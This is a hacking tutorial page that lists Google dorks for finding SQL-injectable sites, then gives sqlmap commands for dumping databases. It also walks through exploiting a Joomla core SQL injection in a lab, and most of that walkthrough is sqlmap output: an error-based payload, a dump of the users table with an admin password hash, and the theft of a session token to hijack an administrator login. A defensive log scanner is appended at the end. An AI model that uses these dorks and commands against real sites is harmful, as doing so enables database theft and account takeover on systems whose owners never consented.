
Dorks for SQL injection

Google dork strings (column 1)
inurl:item_id=
inurl:newsid=
inurl:trainers.php?id=
inurl:news-full.php?id=
inurl:news_display.php?getid=
inurl:index2.php?option=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:newsone.php?id=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:index.php?catid=
inurl:news.php?catid=
inurl:index.php?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:trainers.php?id=
inurl:buy.php?category=
inurl:article.php?ID=
inurl:play_old.php?id=
inurl:declaration_more.php?decl_id=
inurl:pageid=
inurl:games.php?id=
inurl:page.php?file=
inurl:newsDetail.php?id=
inurl:gallery.php?id=
inurl:article.php?id=
inurl:show.php?id=
inurl:staff_id=
inurl:newsitem.php?num=
inurl:readnews.php?id=
inurl:top10.php?cat=
inurl:historialeer.php?num=
inurl:reagir.php?num=
inurl:Stray-Questions-View.php?num=
inurl:forum_bds.php?num=
inurl:game.php?id=
inurl:view_product.php?id=
inurl:newsone.php?id=
inurl:sw_comment.php?id=
inurl:news.php?id=

Google dork strings (column 2)
inurl:review.php?id=
inurl:iniziativa.php?in=
inurl:curriculum.php?id=
inurl:labels.php?id=
inurl:story.php?id=
inurl:look.php?ID=
inurl:newsone.php?id=
inurl:aboutbook.php?id=
inurl:material.php?id=
inurl:opinions.php?id=
inurl:announce.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:tekst.php?idt=
inurl:newscat.php?id=
inurl:newsticker_info.php?idn=
inurl:rubrika.php?idr=
inurl:rubp.php?idr=
inurl:offer.php?idf=
inurl:art.php?idm=
inurl:title.php?id=
inurl:news_view.php?id=
inurl:select_biblio.php?id=
inurl:humor.php?id=
inurl:aboutbook.php?id=
inurl:ogl_inet.php?ogl_id=
inurl:fiche_spectacle.php?id=
inurl:communique_detail.php?id=
inurl:sem.php3?id=
inurl:kategorie.php4?id=
inurl:news.php?id=
inurl:index.php?id=
inurl:faq2.php?id=
inurl:show_an.php?id=
inurl:preview.php?id=

Google dork strings (column 3)
inurl:hosting_info.php?id=
inurl:gallery.php?id=
inurl:rub.php?idr=
inurl:view_faq.php?id=
inurl:artikelinfo.php?id=
inurl:detail.php?ID=
inurl:index.php?=
inurl:profile_view.php?id=
inurl:category.php?id=
inurl:publications.php?id=
inurl:fellows.php?id=
inurl:downloads_info.php?id=
inurl:prod_info.php?id=
inurl:shop.php?do=part&id=
inurl:productinfo.php?id=
inurl:collectionitem.php?id=
inurl:band_info.php?id=
inurl:product.php?id=
inurl:releases.php?id=
inurl:ray.php?id=
inurl:produit.php?id=
inurl:pop.php?id=
inurl:shopping.php?id=
inurl:productdetail.php?id=
inurl:post.php?id=
inurl:viewshowdetail.php?id=
inurl:clubpage.php?id=
inurl:memberInfo.php?id=
inurl:section.php?id=
inurl:theme.php?id=
inurl:page.php?id=
inurl:shredder-categories.php?id=
inurl:tradeCategory.php?id=
inurl:product_ranges_view.php?ID=
inurl:shop_category.php?id=
inurl:loadpsb.php?id=
inurl:transcript.php?id=
inurl:opinions.php?id=
inurl:spr.php?id=
inurl:pages.php?id=
inurl:announce.php?id=
inurl:clanek.php4?id=
inurl:participant.php?id=
inurl:channel_id=
inurl:aboutbook.php?id=
inurl:preview.php?id=
inurl:loadpsb.php?id=
inurl:pages.php?id=
inurl:avd_start.php?avd=
inurl:event.php?id=
inurl:product-item.php?id=
inurl:sql.php?id=
inurl:material.php?id=
inurl:clanek.php4?id=
inurl:announce.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:viewapp.php?id=
inurl:viewphoto.php?id=
inurl:rub.php?idr=
inurl:galeri_info.php?l=
inurl:download.php?id=
inurl:main.php?id=
inurl:review.php?id=
inurl:chappies.php?id=
inurl:read.php?id=
inurl:prod_detail.php?id=
inurl:viewphoto.php?id=
inurl:article.php?id=
inurl:person.php?id=
inurl:productinfo.php?id=
inurl:showimg.php?id=
inurl:view.php?id=
inurl:website.php?id=

Example
.php?id=101

sqlmap
python sqlmap.py -u "target_url" --dbs
python sqlmap.py -u "target_url" -D database_name --tables
python sqlmap.py -u "target_url" -D database_name -T table_name --columns
python sqlmap.py -u "target_url" -D database_name -T table_name -C column_name --dump

Web application penetration testing: SQL injection with sqlmap

Penetration testing using sqlmap

Start with the help option, which lists all the commands available in sqlmap:

sqlmap -h

The basic command is sqlmap -u <URL to inject>:

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1
Sometimes using --time-sec helps to speed up the process, especially when the server responses are slow.

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --time-sec 15

Enumeration of databases

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 --dbs

Tables

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart --tables

The result should be something like this:

Database: acuart
[8 tables]
+-----------+
| artists   |
| carts     |
| categ     |
| featured  |
| guestbook |
| pictures  |
| products  |
| users     |
+-----------+

Columns

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users --columns

Data

sqlmap -u http://testphp.vulnweb.com/listproducts.php?cat=1 -D acuart -T users -C email,name,pass --dump

Joomla is one of the most popular content management systems for building websites. At the moment an estimated 2.8 million websites are built with this CMS. Normally the vulnerabilities found in these systems affect third-party extensions, which limits the attack surface to only those sites that use them. But on some occasions the vulnerabilities are also found in the core of the CMS, as in this case, which has left 6.6% of all websites that use a content management system (Joomla's current market share) exposed to a possible attack that grants administrator-level access.

The vulnerability, published two days ago and for which a patch has already been released, is a SQL injection identified by CVE-2015-7297, CVE-2015-7857 and CVE-2015-7858, affecting versions from 3.2 up to the current latest version, 3.4.4. It sits in a SQL query in the file /administrator/components/com_contenthistory/models/history.php. The Trustwave blog gives a very good technical description of how they joined the dots until they found the vulnerability.

For my part, I have set up a small lab with a vulnerable Joomla, in this case version 3.2, to check how it can be exploited.
I tried the injection directly with sqlmap:

sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E --dbs
Obtaining the injection:

sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E --dbs


[sqlmap banner] {1.0-dev-nongit-20151024} http://sqlmap.org
[!] legal disclaimer: Usage of sqlmap for attacking targets without prior mutual consent
is illegal. It is the end user's responsibility to obey all applicable local, state and federal
laws. Developers assume no liability and are not responsible for any misuse or damage
caused by this program
[*] starting at 19:47:40
[19:47:40] [INFO] loading tamper script 'apostrophemask'
[19:47:40] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[19:47:40] [INFO] testing connection to the target URL
[19:47:40] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[19:47:40] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:47:40] [INFO] testing MySQL
[19:47:40] [INFO] confirming MySQL
[19:47:40] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[19:47:40] [INFO] fetching database names
[19:47:40] [INFO] the SQL query used returns 4 entries
[19:47:40] [INFO] starting 4 threads
[19:47:40] [INFO] resumed: JoomlaLab
[19:47:40] [INFO] resumed: mysql
[19:47:40] [INFO] resumed: performance_schema
[19:47:40] [INFO] resumed: information_schema
available databases [4]:

[*] information_schema
[*] JoomlaLab
[*] mysql
[*] performance_schema
[19:47:40] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 3 times
[19:47:40] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 19:47:40
Next we can enumerate the tables of the database:

sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --tamper=apostrophemask --technique=E -D JoomlaLab --tables
[*] starting at 19:52:28
[19:52:28] [INFO] loading tamper script 'apostrophemask'
[19:52:28] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[19:52:28] [INFO] testing connection to the target URL
[19:52:28] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=' AND (SELECT 5490 FROM(SELECT COUNT(*),CONCAT(0x716b6b6b71,(SELECT (ELT(5490=5490,1))),0x7170717171,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[19:52:28] [WARNING] changes made by tampering scripts are not included in shown payload content(s)
[19:52:28] [INFO] testing MySQL
[19:52:28] [INFO] confirming MySQL
[19:52:28] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[19:52:28] [INFO] fetching tables for database: 'JoomlaLab'
[19:52:28] [WARNING] reflective value(s) found and filtering out
[19:52:28] [INFO] the SQL query used returns 68 entries
[19:52:28] [INFO] starting 10 threads
[19:52:29] [INFO] retrieved: q9741_banner_tracks
[19:52:29] [INFO] retrieved: q9741_assets
[19:52:29] [INFO] retrieved: q9741_categories
[19:52:29] [INFO] retrieved: q9741_banner_clients
[19:52:29] [INFO] retrieved: q9741_associations
[19:52:29] [INFO] retrieved: q9741_banners
[19:52:29] [INFO] retrieved: q9741_contact_details
[19:52:29] [INFO] retrieved: q9741_content_frontpage
[19:52:29] [INFO] retrieved: q9741_content
[19:52:29] [INFO] retrieved: q9741_content_rating
[19:52:29] [INFO] retrieved: q9741_content_types
[19:52:29] [INFO] retrieved: q9741_core_log_searches
[19:52:29] [INFO] retrieved: q9741_contentitem_tag_map
[19:52:29] [INFO] retrieved: q9741_finder_links
[19:52:29] [INFO] retrieved: q9741_extensions
[19:52:29] [INFO] retrieved: q9741_finder_links_terms1
[19:52:29] [INFO] retrieved: q9741_finder_links_terms0
[19:52:29] [INFO] retrieved: q9741_finder_links_terms2
[19:52:29] [INFO] retrieved: q9741_finder_filters
[19:52:29] [INFO] retrieved: q9741_finder_links_terms5
[19:52:29] [INFO] retrieved: q9741_finder_links_terms4
[19:52:29] [INFO] retrieved: q9741_finder_links_terms3
[19:52:29] [INFO] retrieved: q9741_finder_links_terms7
[19:52:29] [INFO] retrieved: q9741_finder_links_terms9
[19:52:29] [INFO] retrieved: q9741_finder_links_terms8
[19:52:29] [INFO] retrieved: q9741_finder_links_termsb
[19:52:29] [INFO] retrieved: q9741_finder_links_terms6
[19:52:29] [INFO] retrieved: q9741_finder_links_termsa
[19:52:29] [INFO] retrieved: q9741_finder_links_termsc
[19:52:30] [INFO] retrieved: q9741_finder_links_termse
[19:52:30] [INFO] retrieved: q9741_finder_links_termsd
[19:52:30] [INFO] retrieved: q9741_finder_terms
[19:52:30] [INFO] retrieved: q9741_finder_taxonomy
[19:52:30] [INFO] retrieved: q9741_finder_tokens
[19:52:30] [INFO] retrieved: q9741_finder_tokens_aggregate
[19:52:30] [INFO] retrieved: q9741_finder_taxonomy_map
[19:52:30] [INFO] retrieved: q9741_finder_links_termsf
[19:52:30] [INFO] retrieved: q9741_finder_terms_common
[19:52:30] [INFO] retrieved: q9741_modules_menu
[19:52:30] [INFO] retrieved: q9741_menu
[19:52:30] [INFO] retrieved: q9741_menu_types
[19:52:30] [INFO] retrieved: q9741_messages_cfg
[19:52:30] [INFO] retrieved: q9741_messages
[19:52:30] [INFO] retrieved: q9741_languages
[19:52:30] [INFO] retrieved: q9741_finder_types
[19:52:30] [INFO] retrieved: q9741_modules
[19:52:30] [INFO] retrieved: q9741_newsfeeds
[19:52:30] [INFO] retrieved: q9741_tags
[19:52:30] [INFO] retrieved: q9741_postinstall_messages
[19:52:30] [INFO] retrieved: q9741_overrider
[19:52:30] [INFO] retrieved: q9741_session
[19:52:30] [INFO] retrieved: q9741_redirect_links
[19:52:30] [INFO] retrieved: q9741_template_styles
[19:52:30] [INFO] retrieved: q9741_schemas
[19:52:30] [INFO] retrieved: q9741_ucm_base
[19:52:30] [INFO] retrieved: q9741_updates
[19:52:30] [INFO] retrieved: q9741_ucm_content
[19:52:30] [INFO] retrieved: q9741_update_sites_extensions
[19:52:30] [INFO] retrieved: q9741_user_notes
[19:52:30] [INFO] retrieved: q9741_update_sites
[19:52:30] [INFO] retrieved: q9741_ucm_history
[19:52:30] [INFO] retrieved: q9741_user_usergroup_map
[19:52:30] [INFO] retrieved: q9741_user_keys
[19:52:30] [INFO] retrieved: q9741_viewlevels
[19:52:30] [INFO] retrieved: q9741_usergroups
[19:52:30] [INFO] retrieved: q9741_user_profiles
[19:52:30] [INFO] retrieved: q9741_users
[19:52:30] [INFO] retrieved: q9741_weblinks
Database: JoomlaLab
[68 tables]
+-------------------------------+
| q9741_assets |
| q9741_associations |
| q9741_banner_clients |
| q9741_banner_tracks |
| q9741_banners |
| q9741_categories |
| q9741_contact_details |
| q9741_content |
| q9741_content_frontpage |
| q9741_content_rating |
| q9741_content_types |
| q9741_contentitem_tag_map |
| q9741_core_log_searches |
| q9741_extensions |
| q9741_finder_filters |
| q9741_finder_links |
| q9741_finder_links_terms0 |
| q9741_finder_links_terms1 |
| q9741_finder_links_terms2 |
| q9741_finder_links_terms3 |
| q9741_finder_links_terms4 |
| q9741_finder_links_terms5 |
| q9741_finder_links_terms6 |
| q9741_finder_links_terms7 |
| q9741_finder_links_terms8 |
| q9741_finder_links_terms9 |
| q9741_finder_links_termsa |
| q9741_finder_links_termsb |
| q9741_finder_links_termsc |
| q9741_finder_links_termsd |
| q9741_finder_links_termse |
| q9741_finder_links_termsf |
| q9741_finder_taxonomy |
| q9741_finder_taxonomy_map |
| q9741_finder_terms |
| q9741_finder_terms_common |
| q9741_finder_tokens |
| q9741_finder_tokens_aggregate |
| q9741_finder_types |
| q9741_languages |
| q9741_menu |
| q9741_menu_types |
| q9741_messages |
| q9741_messages_cfg |
| q9741_modules |
| q9741_modules_menu |
| q9741_newsfeeds |
| q9741_overrider |
| q9741_postinstall_messages |
| q9741_redirect_links |
| q9741_schemas |
| q9741_session |
| q9741_tags |
| q9741_template_styles |
| q9741_ucm_base |
| q9741_ucm_content |
| q9741_ucm_history |
| q9741_update_sites |
| q9741_update_sites_extensions |
| q9741_updates |
| q9741_user_keys |
| q9741_user_notes |
| q9741_user_profiles |
| q9741_user_usergroup_map |
| q9741_usergroups |
| q9741_users |
| q9741_viewlevels |
| q9741_weblinks |
+-------------------------------+
[19:52:30] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 72 times
[19:52:30] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 19:52:30
root@KaliVB:~#
Next one can go the classic route and dump the users table in order to crack the password hash:

sqlmap -u "http://127.0.0.1/Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=" --threads=10 --dbms=MYSQL --technique=E -D JoomlaLab -T q9741_users --dump

[*] starting at 21:00:11
[21:00:11] [WARNING] provided value for parameter 'list[select]' is empty. Please, always use only valid parameter values so sqlmap could be able to run properly
[21:00:11] [INFO] testing connection to the target URL
[21:00:11] [WARNING] there is a DBMS error found in the HTTP response body which could interfere with the results of the tests
sqlmap resumed the following injection point(s) from stored session:
---
Parameter: list[select] (GET)
Type: error-based
Title: MySQL >= 5.0 error-based - Parameter replace
Payload: option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=(SELECT 9327 FROM(SELECT COUNT(*),CONCAT(0x716b706b71,(SELECT (ELT(9327=9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a)
---
[21:00:11] [INFO] testing MySQL
[21:00:11] [INFO] confirming MySQL
[21:00:11] [INFO] the back-end DBMS is MySQL
web server operating system: Linux Debian
web application technology: Apache 2.4.10
back-end DBMS: MySQL >= 5.0.0
[21:00:11] [INFO] fetching columns for table 'q9741_users' in database 'JoomlaLab'
[21:00:11] [WARNING] reflective value(s) found and filtering out
[21:00:11] [INFO] the SQL query used returns 15 entries
[21:00:11] [INFO] starting 10 threads
[21:00:11] [INFO] retrieved: id
[21:00:11] [INFO] retrieved: name
[21:00:11] [INFO] retrieved: registerDate
[21:00:11] [INFO] retrieved: password
[21:00:11] [INFO] retrieved: email
[21:00:11] [INFO] retrieved: block
[21:00:11] [INFO] retrieved: sendEmail
[21:00:11] [INFO] retrieved: username
[21:00:11] [INFO] retrieved: activation
[21:00:11] [INFO] retrieved: lastvisitDate
[21:00:11] [INFO] retrieved: varchar(100)
[21:00:11] [INFO] retrieved: varchar(255)
[21:00:11] [INFO] retrieved: tinyint(4)
[21:00:11] [INFO] retrieved: datetime
[21:00:11] [INFO] retrieved: varchar(100)
[21:00:11] [INFO] retrieved: tinyint(4)
[21:00:11] [INFO] retrieved: int(11)
[21:00:11] [INFO] retrieved: datetime
[21:00:11] [INFO] retrieved: varchar(150)
[21:00:11] [INFO] retrieved: varchar(100)
[21:00:11] [INFO] retrieved: params
[21:00:11] [INFO] retrieved: resetCount
[21:00:11] [INFO] retrieved: otep
[21:00:11] [INFO] retrieved: lastResetTime
[21:00:11] [INFO] retrieved: otpKey

[21:00:11] [INFO] retrieved: text


[21:00:12] [INFO] retrieved: varchar(1000)
[21:00:12] [INFO] retrieved: int(11)
[21:00:12] [INFO] retrieved: datetime
[21:00:12] [INFO] retrieved: varchar(1000)
[21:00:12] [INFO] fetching entries for table 'q9741_users' in database 'JoomlaLab'
[21:00:12] [INFO] the SQL query used returns 1 entries
[21:00:12] [INFO] retrieved: 0
[21:00:12] [INFO] retrieved: 0
[21:00:12] [INFO] retrieved: correo@gmail.com
[21:00:12] [INFO] retrieved: 601
[21:00:12] [INFO] retrieved: 0000-00-00 00:00:00
[21:00:12] [INFO] retrieved: 2015-10-24 16:16:32
[21:00:12] [INFO] retrieved: Super User
[21:00:12] [INFO] retrieved:
[21:00:12] [INFO] retrieved:
[21:00:12] [INFO] retrieved:
[21:00:12] [INFO] retrieved: $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y
[21:00:12] [INFO] retrieved: 2015-10-24 16:11:53
[21:00:12] [INFO] retrieved: 0
[21:00:12] [INFO] retrieved: 1
[21:00:12] [INFO] retrieved: alberto
[21:00:12] [INFO] analyzing table dump for possible password hashes
Database: JoomlaLab
Table: q9741_users
[1 entry]
(the 15-column row of the dump, shown here as column: value)
id: 601
name: Super User
otep: <blank>
email: correo@gmail.com
block: 0
otpKey: <blank>
params: <blank>
username: alberto
password: $2y$10$SD20rJFbG7QEXyfMaw9IC.yRigW2NwZ2RVZzbFlNJ1/cDTsC9DL2y
sendEmail: 1
activation: 0
resetCount: 0
registerDate: 2015-10-24 16:11:53
lastResetTime: 0000-00-00 00:00:00
lastvisitDate: 2015-10-24 16:16:32
[21:00:12] [INFO] table 'JoomlaLab.q9741_users' dumped to CSV file
'/root/.sqlmap/output/127.0.0.1/dump/JoomlaLab/q9741_users.csv'
[21:00:12] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 50 times
[21:00:12] [INFO] fetched data logged to text files under '/root/.sqlmap/output/127.0.0.1'
[*] shutting down at 21:00:12
But taking it a step further, what Trustwave do to skip the tedious process of cracking the password is to query the *_session table and take the administrator's authentication token in order to hijack the session.

[sqlmap output truncated in the source: the session table is dumped through the same resumed injection point against option=com_contenthistory; the visible fragments show a row for user guest and serialized PHP session data (session.counter, session.timer.start, session.timer.last, isRoot, id, name, username, email, password, _authActions, _errorMsg, _errors) logged under '/root/.sqlmap/output/127.0.0.1'.]
Once the token is obtained, you only have to refresh the browser.

Refresh the browser
Modify the cookie with the session_id value

Manipulate the cookie with the session id

And we are in.

Session hijacking
It has been shown how simple it is to exploit this vulnerability. The recommendation is to update as soon as possible to the latest version, which fixes this vulnerability, and to wait for November, when the renewed version 3.5 will be released.
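As an added example (not part of the original post, nor code from sqlmap or Joomla), the following Python check runs over constructed Apache access-log lines and flags, from the defender's side, what the runs above would leave in a web server log: requests to com_contenthistory carrying list[select], and, at higher severity, parameter values with the FLOOR(RAND(0)*2)/CONCAT(0x..)/INFORMATION_SCHEMA shape of the error-based payload shown in the sqlmap output. The log lines, the client IP, the severity scheme and the names scan_log, inspect_request and normalise are assumptions.

```python
import re
from urllib.parse import urlsplit, parse_qs, unquote_plus

# Constructed Apache combined-log lines (not from the post). Lines 1-2 carry the
# com_contenthistory list[select] parameter with the error-based payload shape from
# the runs above; line 1 uses the fullwidth apostrophe (%EF%BC%87) that the
# apostrophemask tamper writes. Line 3 is a benign request.
SAMPLE_LOG = """\
127.0.0.1 - - [24/Oct/2015:19:47:40 +0200] "GET /Joomla/index.php?option=com_contenthistory&view=history&list[ordering]=&item_id=1&list[select]=%EF%BC%87%20AND%20(SELECT%205490%20FROM(SELECT%20COUNT(*),CONCAT(0x716b6b6b71,(SELECT%20(ELT(5490%3D5490,1))),0x7170717171,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 2310 "-" "sqlmap/1.0-dev-nongit-20151024 (http://sqlmap.org)"
127.0.0.1 - - [24/Oct/2015:21:00:11 +0200] "GET /Joomla/index.php?option=com_contenthistory&view=history&item_id=1&list[select]=(SELECT%209327%20FROM(SELECT%20COUNT(*),CONCAT(0x716b706b71,(SELECT%20(ELT(9327%3D9327,1))),0x7170767a71,FLOOR(RAND(0)*2))x%20FROM%20INFORMATION_SCHEMA.CHARACTER_SETS%20GROUP%20BY%20x)a) HTTP/1.1" 500 2310 "-" "Mozilla/5.0"
127.0.0.1 - - [24/Oct/2015:21:05:02 +0200] "GET /Joomla/index.php?option=com_content&view=article&id=1 HTTP/1.1" 200 8421 "-" "Mozilla/5.0"
"""

# Only the fields this check needs from a combined-log line.
LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] "(?P<method>[A-Z]+) (?P<target>\S+) [^"]*" '
    r'(?P<status>\d{3}) \S+ "[^"]*" "(?P<ua>[^"]*)"'
)

# Building blocks of the MySQL error-based payload sqlmap produced above; matched
# against URL-decoded, whitespace-normalised parameter values.
PAYLOAD_RE = [
    (r"FLOOR\s*\(\s*RAND\s*\(\s*0\s*\)\s*\*\s*2\s*\)", "FLOOR(RAND(0)*2) duplicate-key trick"),
    (r"INFORMATION_SCHEMA\.", "INFORMATION_SCHEMA reference"),
    (r"CONCAT\s*\(\s*0x[0-9a-f]+", "CONCAT() with hex delimiter"),
    (r"\bELT\s*\(", "ELT() conditional"),
]

def normalise(value):
    """URL-decode until stable, fold U+FF07 (apostrophemask) back to ', collapse whitespace."""
    prev = None
    while value != prev:
        prev, value = value, unquote_plus(value)
    return re.sub(r"\s+", " ", value.replace("\uff07", "'")).strip()

def inspect_request(target, status):
    """Return (severity, reasons): 'none', 'medium' (vulnerable endpoint) or 'high' (payload)."""
    query = parse_qs(urlsplit(target).query, keep_blank_values=True)
    context, payload = [], []
    # The bug sits behind option=com_contenthistory and is driven through list[select].
    if query.get("option") == ["com_contenthistory"] and "list[select]" in query:
        context.append("com_contenthistory request carrying list[select]")
    for key, values in query.items():
        for raw in values:
            value = normalise(raw)
            for pattern, label in PAYLOAD_RE:
                if re.search(pattern, value, re.IGNORECASE):
                    payload.append(f"{label} in parameter {key}")
    if payload:
        severity = "high"
    elif context:
        severity = "medium"
    else:
        return "none", []
    reasons = context + payload
    if status == "500":
        # Every run in the post produced HTTP 500s: the DBMS error surfaced in the response.
        reasons.append("HTTP 500 response (DBMS error surfaced, as in the runs above)")
    return severity, reasons

def scan_log(text):
    """Return [(line_no, ip, severity, reasons)] for every suspicious log line."""
    hits = []
    for n, line in enumerate(text.splitlines(), 1):
        m = LOG_RE.match(line)
        if not m:
            continue
        severity, reasons = inspect_request(m.group("target"), m.group("status"))
        if severity != "none":
            hits.append((n, m.group("ip"), severity, reasons))
    return hits

if __name__ == "__main__":
    for n, ip, severity, reasons in scan_log(SAMPLE_LOG):
        print(f"line {n} from {ip}: {severity} - " + "; ".join(reasons))
```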
